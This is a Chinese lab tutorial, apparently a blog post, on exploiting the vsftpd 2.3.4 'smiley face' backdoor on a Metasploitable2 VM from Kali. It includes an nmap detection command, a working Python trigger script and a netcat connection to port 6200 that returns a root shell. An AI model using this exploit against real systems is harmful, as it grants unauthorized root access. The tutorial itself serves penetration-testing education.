Kali渗透测试-远程控制:6200端口变成“后门”

简介: Kali渗透测试-远程控制:6200端口变成“后门”

Kali渗透测试-远程控制:6200端口变成“后门”
测试环境
攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248)

靶机:Metasploitable2 - Linux (IP:192.168.68.205)

攻击工具:Netcat(nc) “瑞士军刀”

扫描工具:Nmap version 7.92

漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200端口打开一个连接,从而通过这个连接失效对目标主机的控制。关于“笑脸漏洞”大家可以自行搜索一下相关信息。

测试步骤
1. 攻击上运行nmap扫描

┌──(kali㉿kali)-[~]
└─$ nmap --script ftp-vsftpd-backdoor 192.168.68.205

image.png

2. Netcat 扫描端口测试连接
以靶机80端口为例测试,命令如下:

┌──(kali㉿kali)-[~]
└─$ nc -v 192.168.68.205 80  
192.168.68.205: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.68.205] 80 (http) open

可以看到这个端口状态为open, 也就是开放的。接下来试一下可否通过80端口控制目标, 命令如下:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 80

测试完成之后,系统会暂时没有反应。再输入一条Linux操作系统用于现实用户名称的whoami命令,以此来查看是否能通过80端口来控制目标,如下图所示:
image.png

虽然出现了如上提示,但这只是Metasploittable2的欢迎界面,尝试失败。

3. 激活笑脸漏洞,开启6200端口
分享一段注入脚本代码,如下:

import socket
from ftplib import FTP
host_ip = '192.168.68.205'
ftp = FTP()
backdoorstr = 'hello:)'
backdoorpass = "it's me"
try:
    ftp.connect(host_ip, 21, timeout = 2)
    ftp.login(backdoorstr, backdoorpass)
except:
    print('完成笑脸注入')

image.png

先运行注入脚本,如上图所示,注入成功。然后运行如下命令:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 6200

运行结果如下图:

image.png

虽然只显示了一个光标,但是对Netcat表示已经成功连接了。

4. 输入测试命令
输入如下命令,得到回应–root

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 6200                                                                                              1 ⨯
whoami
root

以root身份登录,然后输入其他测试命令,如“ls”、 “cd”、 “pwd”也都成功,如下图所示:

image.png

image.png

通过如上测试,可以看到6200端口上运行的vsftd-2.3.4。当用户名中存在“:)”两个连续的符号时,就会激活vsf_sysutil_extra函数,这个函数会在本地建立一个socket,然后绑定到6200端口,之后调用exec函数绑定/bin/sh。

相关文章
|
1月前
|
Linux Shell 网络安全
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
75 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
|
2月前
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
3月前
|
网络协议 安全 Linux
Kali渗透测试:拒绝服务攻击(一)
Kali渗透测试:拒绝服务攻击(一)
228 2
|
3月前
|
存储 网络协议 安全
Kali渗透测试:拒绝服务攻击(二)
Kali渗透测试:拒绝服务攻击(二)
347 0
|
3月前
|
安全 网络安全 数据库
Kali测试:散列密码破解(一)
Kali渗透测试:散列密码破解(一)
46 0
|
3月前
|
安全 应用服务中间件 网络安全
Kali测试:散列密码破解(二)
Kali渗透测试:散列密码破解(二)
141 0
|
3月前
|
Web App开发 测试技术 网络安全
Kali 测试:使用Burp Suite 对网络认证服务的攻击(一)
Kali 渗透测试:使用Burp Suite 对网络认证服务的攻击(一)
119 0
|
3月前
|
网络安全 数据安全/隐私保护 安全
Kali 测试:使用Burp Suite 对网络认证服务的攻击(二)
Kali 渗透测试:使用Burp Suite 对网络认证服务的攻击(二)
222 0
|
8天前
|
数据可视化 前端开发 测试技术
接口测试新选择:Postman替代方案全解析
在软件开发中,接口测试工具至关重要。Postman长期占据主导地位,但随着国产工具的崛起,越来越多开发者转向更适合中国市场的替代方案——Apifox。它不仅支持中英文切换、完全免费不限人数,还具备强大的可视化操作、自动生成文档和API调试功能,极大简化了开发流程。
|
8天前
|
存储 测试技术 数据库
接口测试工具攻略:轻松掌握测试技巧
在互联网快速发展的今天,软件系统的复杂性不断增加,接口测试工具成为确保系统稳定性的关键。它如同“翻译官”,模拟请求、解析响应、验证结果、测试性能并支持自动化测试,确保不同系统间信息传递的准确性和完整性。通过Apifox等工具,设计和执行测试用例更加便捷高效。接口测试是保障系统稳定运行的第一道防线。